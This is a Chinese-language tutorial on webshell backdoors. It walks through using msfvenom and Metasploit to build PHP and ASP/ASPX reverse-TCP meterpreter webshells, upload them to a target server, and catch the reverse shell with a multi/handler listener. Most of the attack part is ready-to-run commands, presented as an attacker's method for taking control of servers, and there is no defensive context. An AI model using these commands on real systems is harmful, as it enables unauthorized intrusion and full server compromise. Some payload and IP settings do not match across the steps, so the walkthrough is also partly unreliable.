web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。
1.meterpreter后门
在metasploit中,有一个名为php meterpreter的payload,利用这个模块可创建具有meterpreter功能的 php webshell 。在攻击中使用metasploit php shell 的步骤如下所示:
- 使用msfvenom创建一个webshell.php
- 上传webshell.php到目标服务器
- 运行metasploit multi-handler开始监听
- 访问webshell.php页面
- 获得反弹的metasploit shell
以下是通过webshell拿网站的大致流程:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.1 lport=4444 -f raw >1.
php (通过msfvenom工具制作php meterpreter)
然后将1.php上传到目标服务器上,接着启动msfconsole,使用以下命令设置监听。
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.100 (自己的攻击机IP地址)
run (运行)
接着在网站上访问那个1.php的文件,回到msf下面,可以看见服务端已经反弹成功了。
最后使用sysinfo和getuid等meterpreter命令渗透目标主机。
2.aspx meterpreter后门
本节要介绍的是metasploit下名为shell_reverse_tcp的payload,利用这个模块可创建具有meterpreter功能的各版本shell code。
在攻击中使用aspx meterpreter后门的步骤和metasploit php shell 的大概相同。首先使用下列代码调用该模块,并设置相关参数
use windows/shell_reverse_tcp (使用该payload)
info
set lhost 192.168.1.100
set lport 4444
save 保存
生成各版本shellcode的命令如下:
generate -t asp //生成asp版的shellcode
generate -t aspx //生成aspx版的shellcode
在这里我们生成一个asp版的webshell。
我们把内容保存为asp.asp,在上传到目标服务器。
接着启动msfconsole,使用以下命令设置监听。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 4444
run
接着在网站上访问那个asp.asp的文件,回到msf下面,可以看见服务端已经反弹成功了。